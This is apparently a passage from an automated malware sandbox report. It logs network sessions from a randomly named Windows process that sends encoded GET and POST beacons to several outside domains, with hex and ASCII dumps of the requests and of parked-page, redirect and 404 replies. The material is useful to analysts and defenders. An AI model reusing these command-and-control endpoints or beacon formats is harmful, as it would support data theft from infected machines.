                                              Data Raw: 35 48 45 3d 57 6c 53 71 66 73 6a 55 2b 66 68 6a 6a 72 2f 4b 4b 77 64 65 74 2b 58 61 76 32 71 69 65 51 67 2f 4a 67 75 48 2b 69 6e 6c 39 56 39 31 7a 48 52 47 30 61 46 56 47 6f 78 32 42 4b 65 4e 6c 2b 52 68 77 57 38 44 69 4c 74 58 75 49 47 51 68 55 41 73 6a 51 71 4a 79 56 41 63 72 71 32 77 34 78 66 6e 39 36 48 54 79 6e 33 75 5a 6c 62 50 38 74 44 48 65 70 36 31 58 31 6f 4c 49 45 34 64 33 76 53 6c 78 30 37 48 32 70 62 73 53 38 4e 2b 2f 64 4b 4e 65 4c 65 41 51 4a 54 41 64 43 54 68 6c 38 38 43 46 6e 61 4f 4a 78 4b 59 45 6d 45 4d 5a 54 79 59 43 48 66 71 33 73 47 58 55 4b 4f 64 63 72 75 65 47 48 4a 6f 6d 78 45 41 5a 61 55 7a 37 79 65 73 68 62 69 49 67 4a 71 31 7a 67 65 43 4d 75 54 72 4c 47 64 58 72 62 5a 34 37 55 78 54 43 52 70 38 66 67 39 4c 4c 74 77 38 73 4a 6f 5a 32 36 36 38 69 32 46 38 61 71 46 49 4e 69 46 31 34 32 4a 5a 58 50 30 58 6c 56 76 37 30 71 79 47 6c 79 57 42 35 36 44 7a 72 6e 63 50 38 75 37 54 2f 56 74 41 44 54 4b 61 6b 33 49 63 66 4d 54 46 62 50 67 55 51 36 57 47 39 59 79 42 5a 62 56 61 4c 2f [TRUNCATED]
                                              Data Ascii: 5HE=WlSqfsjU+fhjjr/KKwdet+Xav2qieQg/JguH+inl9V91zHRG0aFVGox2BKeNl+RhwW8DiLtXuIGQhUAsjQqJyVAcrq2w4xfn96HTyn3uZlbP8tDHep61X1oLIE4d3vSlx07H2pbsS8N+/dKNeLeAQJTAdCThl88CFnaOJxKYEmEMZTyYCHfq3sGXUKOdcrueGHJomxEAZaUz7yeshbiIgJq1zgeCMuTrLGdXrbZ47UxTCRp8fg9LLtw8sJoZ2668i2F8aqFINiF142JZXP0XlVv70qyGlyWB56DzrncP8u7T/VtADTKak3IcfMTFbPgUQ6WG9YyBZbVaL/s49ChmorflTx6z1wpuNHisQL7iviI62DZaMXumwcXvvTSY2KVDZ9zq9Z3gtO2PMczxLgqLuiISB5KQxUA4WP6ZfWQ7LFch5DGoj58CiNheJwwuStIAIzsQocSOiPRVT7D2azu8s7HQal/KMYyHuhJeFDqYGQmZ/QTdkWYtleygbEQLWQxPF2pRDT9xk6XDZzgVZFm0214aUTbrDL+Z+wocPNwWfggJVnAotjIZZrRW2uGj41J7nEDV3U+CJPmPESZYSRnIFcF3joP1I1F+VrnqWr0B37oXmVNfGA0i3WD2aOX3jxwBzGGXn9JHcSjYhAvEQW8zi68GjauNypJNYMr+GIF2dxtO7el8dnraqhnh9wt+brzgtlX7RUqPJbJUVaQ73Ko6UPfn2NBPd3w989FYN3w4cINI5ajKhVKiMPnwvj9ynBjoTlSjGeZQFJZJ5C54Cs5KusXjliTa59TRUTq4zeXWHnqtbdzMDEjnyhIR+rLqx0gvM2S7WTnQihpSZu2AIK02hP3Uz7akpojDIwv1Cs5IfH6G7fSrJ6EslBLIxeFRvb0nngr0YR4u0ycVSIsar4HWQGnAiOaPq+2mnvqxZv8p5RaxMrD6qH7XAHcUUyt0TQs8M3D+ll+r1oK1DGsG82b/CSpcnuhM1C00CH6BisJLVpvEybvk [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.74973384.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:06.219988108 CEST445OUTGET /rjez/?5HE=bn6Kcb/G7NRz+77UcQJW4qLiu1GocAgaZTa4wjHl00pV2XIs1a9SZ4czJq6TxPof2hMjxPpppayxuFpboBicziwpjYC97Q/w/47U8Wa1V0+MlpjcY/2kLWYOIWUc1P6D3HPWzK7wcq5j&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:06.685714960 CEST1236INHTTP/1.1 200 OK
                                              Server: hcdn
                                              Date: Sun, 21 Jul 2024 11:33:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 10072
                                              Connection: close
                                              Vary: Accept-Encoding
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 67032ff9c996a836bca0c57b151bca89-bos-edge3
                                              Expires: Sun, 21 Jul 2024 11:33:05 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                              Jul 21, 2024 13:33:06.685775995 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                              Jul 21, 2024 13:33:06.685813904 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                              Jul 21, 2024 13:33:06.685847998 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                              Jul 21, 2024 13:33:06.685884953 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                              Jul 21, 2024 13:33:06.685940027 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                              Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                              Jul 21, 2024 13:33:06.686073065 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                              Jul 21, 2024 13:33:06.686110020 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                              Jul 21, 2024 13:33:06.686162949 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.74973413.248.169.48806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:11.743964911 CEST709OUTPOST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 77 77 6f 77 75 30 6a 71 31 47 43 4b 51 65 30 51 48 4f 6b 4e 36 6d 2f 78 4e 54 74 72 50 6a 39 76 50 55 5a 30 32 75 56 44 58 65 36 57 6e 32 31 2b 66 48 2f 30 46 75 61 41 6a 79 70 30 63 6e 2b 33 39 73 45 50 50 74 6a 4c 65 34 5a 6d 66 51 4b 57 71 67 51 64 45 64 5a 4f 4a 78 56 51 4e 69 4a 58 72 43 73 45 73 59 4f 75 4e 30 55 72 4f 45 6e 74 4f 49 34 56 75 67 42 2b 2b 61 6e 4c 56 58 4b 66 7a 44 41 30 4f 62 4f 2b 57 33 47 47 54 44 2f 63 38 6f 57 64 53 53 55 55 74 4f 65 57 58 64 43 6f 79 31 34 6e 44 78 38 31 4e 2f 74 65 74 44 50 5a 45 5a 72 76 7a 51 49 4d 56 4c 48 72 41 31 65 6c 50 4a 32 32 47 42 57 4b 66 68 33 6b 46 6e 55 41 38 41 3d 3d
                                              Data Ascii: 5HE=wwowu0jq1GCKQe0QHOkN6m/xNTtrPj9vPUZ02uVDXe6Wn21+fH/0FuaAjyp0cn+39sEPPtjLe4ZmfQKWqgQdEdZOJxVQNiJXrCsEsYOuN0UrOEntOI4VugB++anLVXKfzDA0ObO+W3GGTD/c8oWdSSUUtOeWXdCoy14nDx81N/tetDPZEZrvzQIMVLHrA1elPJ22GBWKfh3kFnUA8A==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.74973513.248.169.48806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:14.303020000 CEST729OUTPOST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 77 77 6f 77 75 30 6a 71 31 47 43 4b 52 2f 45 51 55 64 4d 4e 38 47 2b 44 54 6a 74 72 42 44 39 72 50 55 64 30 32 76 51 63 58 74 65 57 6e 58 46 2b 59 47 2f 30 45 75 61 41 72 53 70 4c 59 6e 2b 4b 39 73 59 78 50 74 76 4c 65 34 4e 6d 66 56 6d 57 71 7a 34 63 47 4e 5a 4d 47 52 56 53 53 79 4a 58 72 43 73 45 73 59 4c 6d 4e 30 63 72 4f 55 58 74 4a 64 4d 57 79 51 42 2f 35 61 6e 4c 52 58 4b 62 7a 44 42 6e 4f 65 6d 55 57 31 2b 47 54 43 50 63 38 35 57 65 62 53 55 53 6a 75 66 56 54 66 66 69 73 58 4d 64 47 43 51 76 42 50 42 4a 68 56 53 37 65 37 6e 44 74 42 77 33 52 4a 6a 64 58 54 44 51 4e 49 79 75 4c 6a 69 72 41 57 53 4f 49 31 31 45 71 36 42 30 64 67 71 58 50 46 6e 46 5a 4f 6a 6f 4c 76 36 2f 4d 48 6f 3d
                                              Data Ascii: 5HE=wwowu0jq1GCKR/EQUdMN8G+DTjtrBD9rPUd02vQcXteWnXF+YG/0EuaArSpLYn+K9sYxPtvLe4NmfVmWqz4cGNZMGRVSSyJXrCsEsYLmN0crOUXtJdMWyQB/5anLRXKbzDBnOemUW1+GTCPc85WebSUSjufVTffisXMdGCQvBPBJhVS7e7nDtBw3RJjdXTDQNIyuLjirAWSOI11Eq6B0dgqXPFnFZOjoLv6/MHo=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.74973613.248.169.48806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:16.852766991 CEST1742OUTPOST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 77 77 6f 77 75 30 6a 71 31 47 43 4b 52 2f 45 51 55 64 4d 4e 38 47 2b 44 54 6a 74 72 42 44 39 72 50 55 64 30 32 76 51 63 58 74 57 57 6d 68 78 2b 65 68 54 30 43 65 61 41 6c 79 70 4f 59 6e 2b 74 39 73 51 39 50 73 54 78 65 38 39 6d 5a 33 75 57 2f 32 4d 63 50 4e 5a 4d 65 68 56 52 4e 69 4a 47 72 43 38 41 73 59 62 6d 4e 30 63 72 4f 57 50 74 66 59 34 57 68 41 42 2b 2b 61 6e 50 56 58 4b 2f 7a 44 70 33 4f 65 71 75 57 6d 32 47 53 69 66 63 2f 4c 4f 65 55 53 55 51 6b 75 66 33 54 66 54 68 73 58 51 37 47 43 55 4a 42 4d 52 4a 68 51 66 4d 4d 2f 37 4b 38 51 38 2b 50 66 7a 52 63 41 76 51 4a 4c 47 33 4f 78 32 65 46 30 75 49 47 45 56 72 2b 61 51 4b 44 78 75 5a 44 33 58 50 56 35 2b 32 55 4f 53 35 56 77 78 37 75 72 38 49 43 7a 4f 52 56 52 48 54 47 32 4a 4d 30 56 6d 64 56 4b 47 78 4a 4c 34 47 6e 5a 49 78 75 67 64 42 62 50 6b 51 4f 2f 4c 5a 48 77 51 75 61 79 44 32 70 43 55 6c 51 74 49 31 39 72 65 36 75 36 5a 51 6e 61 6b 6e 39 75 37 36 37 34 50 4c 69 41 4e 6e 54 4e 53 37 42 57 44 30 31 35 75 38 59 38 46 50 42 4f [TRUNCATED]
                                              Data Ascii: 5HE=wwowu0jq1GCKR/EQUdMN8G+DTjtrBD9rPUd02vQcXtWWmhx+ehT0CeaAlypOYn+t9sQ9PsTxe89mZ3uW/2McPNZMehVRNiJGrC8AsYbmN0crOWPtfY4WhAB++anPVXK/zDp3OequWm2GSifc/LOeUSUQkuf3TfThsXQ7GCUJBMRJhQfMM/7K8Q8+PfzRcAvQJLG3Ox2eF0uIGEVr+aQKDxuZD3XPV5+2UOS5Vwx7ur8ICzORVRHTG2JM0VmdVKGxJL4GnZIxugdBbPkQO/LZHwQuayD2pCUlQtI19re6u6ZQnakn9u7674PLiANnTNS7BWD015u8Y8FPBOs3vHz3eIs0227T48c1D2hcPeyeuhf6QNCRgmhB4dbHz1udCIbFGLO7i3WJt86wWk5PB4Z4ciPrZfVgvO82rgQFDFIR9Q0b9H7JoJtpC33AeyWQrcD0+OkL2pZDhrRh/x8S0qrctPqP7pInZ80ELzSp/9UomCtJ1zoNRxhsUl9u+Zf5ZiDu4yhEnbFjscD82A6GCnWRujnro7ON/Vl2J33qPL6Wk+eUZm1eAfHN1cUTwITHdwIT7BtY3LHshDctA1majYIMXZOBKVazQPboqlKv4jEuyZiKDV3NReAHrxL4tsEa4GTugVwhYhyJ9oWP0/rO+gAviVIRJqQp1xDx3hn3V9ILvB2jIzUbJ8k1YLO9W/obIvXj1Tx4ivIelWjFyUOzmDsCJsxQQIgji3xVWl8AtQfhzs0TTdQWBXKx+AzSnTXtXCu0c6iJ/Mi815bG/fnPgLXJNpt/BhonkXON3BKRkw0jPCY4P9pO6YMxPhHKrwIEHqbNq2wt4g/jCPG6ouI+zec1k2b12BReU+L9lCumUrs20sTmENPuxcCp5VvusjsQA5Ezx+QoL0NOgkCagFGLINPZAqp1M4FDgq56yXP/nDX73cQdTv1cSz/g7Pd64ADEdi+4eDmWEYTCrWrypG/Ej0Gz1NLd4+uPmGVW5ZZ5EVgdewVxZHGU [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.74973713.248.169.48806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:19.395808935 CEST446OUTGET /m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:19.875340939 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:33:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 39 79 41 51 74 41 50 76 37 56 61 6a 62 4d 6f 7a 43 39 35 4b 6a 78 48 63 44 67 5a 42 4e 41 6c 6f 4f 6a 78 39 78 6f 78 45 5a 66 47 66 6a 78 64 6a 55 57 47 6c 62 75 37 4f 76 77 5a 4c 4b 48 7a 64 2b 70 51 4f 4a 37 7a 54 62 34 56 42 55 46 36 54 2b 6a 5a 56 47 64 77 56 47 54 6f 66 4d 47 56 4f 68 68 51 64 75 6f 2f 67 4f 57 41 56 58 58 66 75 66 73 6b 30 75 69 73 48 2b 4a 6e 76 56 6c 69 39 33 68 31 53 56 4a 4f 70 42 54 33 43 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.749738148.135.97.125806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:25.259702921 CEST703OUTPOST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 6c 47 7a 41 34 51 59 74 6f 35 4d 77 42 4f 6f 44 33 68 69 4a 30 53 57 72 52 75 6c 50 46 6f 6a 79 46 67 58 48 72 64 50 6b 38 34 65 45 76 6b 76 51 48 4b 53 42 44 73 64 55 39 51 52 52 2f 37 78 47 46 66 2f 76 71 5a 65 46 48 44 59 39 31 58 59 47 4f 35 6a 7a 51 31 63 49 75 32 47 6b 79 4e 6d 76 7a 6f 53 31 64 32 71 53 51 57 50 56 69 56 6c 42 58 38 73 50 62 57 67 78 69 71 54 76 45 41 6f 56 54 37 6d 30 42 41 52 4b 52 70 4b 75 79 45 52 31 69 30 77 65 6f 32 42 5a 5a 30 69 69 46 6c 58 55 71 79 41 42 33 4b 66 52 4a 6f 35 54 47 72 5a 43 48 36 63 6e 64 72 37 4d 63 52 44 7a 5a 6d 46 71 48 31 66 56 47 74 56 79 63 58 30 54 4b 64 78 72 4f 77 3d 3d
                                              Data Ascii: 5HE=lGzA4QYto5MwBOoD3hiJ0SWrRulPFojyFgXHrdPk84eEvkvQHKSBDsdU9QRR/7xGFf/vqZeFHDY91XYGO5jzQ1cIu2GkyNmvzoS1d2qSQWPViVlBX8sPbWgxiqTvEAoVT7m0BARKRpKuyER1i0weo2BZZ0iiFlXUqyAB3KfRJo5TGrZCH6cndr7McRDzZmFqH1fVGtVycX0TKdxrOw==
                                              Jul 21, 2024 13:33:25.839411974 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 